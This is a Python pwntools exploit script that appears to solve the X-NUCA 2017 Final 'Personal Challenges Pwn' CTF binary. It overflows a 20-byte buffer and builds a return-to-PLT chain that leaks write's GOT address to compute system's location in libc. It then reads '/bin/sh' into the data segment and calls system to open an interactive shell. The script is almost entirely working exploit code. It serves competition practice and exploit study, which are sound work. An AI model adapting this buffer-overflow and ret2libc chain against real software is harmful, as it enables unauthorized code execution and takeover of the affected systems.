xnuca-2017-final-personal-challenge-pwn.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# For: X-NUCA 2017 Final
# Game: Personal Challenges Pwn

from pwn import *

# set context
context.log_level = 'debug'

# open binaries
libc = ELF('/lib32/libc.so.6')
file = ELF('./game')

# run
Io = process("./game")

# search symbols
read_got = file.got['read']
write_got = file.got['write']

read_offset = libc.symbols['read']
write_offset = libc.symbols['write']
system_offset = libc.symbols['system']

write_plt = file.plt['write']
read_plt = file.plt['read']

# start = file.symbols['__libc_start_main']
start = 0x080484A0

data_seg_addr = 0x0804A02C

# define
STDIN = 0
STDOUT = 1
WORD_SIZE = 4

def touch():
    Io.readuntil(">")
    Io.sendline("1\r")
    Io.sendline("admin")
    Io.sendline("3")
    Io.sendline("4")

# call write(stdout, write_plt, 4)
# return to __libc_start_main
touch()
junk = "A" * 20
payload = junk
payload += p32(write_plt)
payload += p32(start)
payload += p32(STDOUT)
payload += p32(write_got)
payload += p32(WORD_SIZE)
print "Payload: %r" % (payload)
Io.sendline(payload)
length_to_ignore = len("Please input your name:\n>>Please enter a temporary marker to resume game progress later :)\nSave Success :)\n")
write_addr = u32(Io.read()[length_to_ignore:length_to_ignore + WORD_SIZE])
print "write_addr: %08x" % (write_addr)

system_addr = system_offset - write_offset + write_addr
print "system_addr: %08x" % (system_addr)

# call read(stdin, data_seg_addr, len('/bin/sh\x00'))
# then return and call system('/bin/sh')
touch()
payload = junk
payload += p32(read_plt)
payload += p32(system_addr)
payload += p32(0)
payload += p32(data_seg_addr)
payload += p32(len("/bin/sh\x00") + 1)
payload += p32(0)
payload += p32(data_seg_addr)
print "Payload: %r" % (payload)
Io.sendline(payload)
Io.sendline("/bin/sh")
Io.interactive()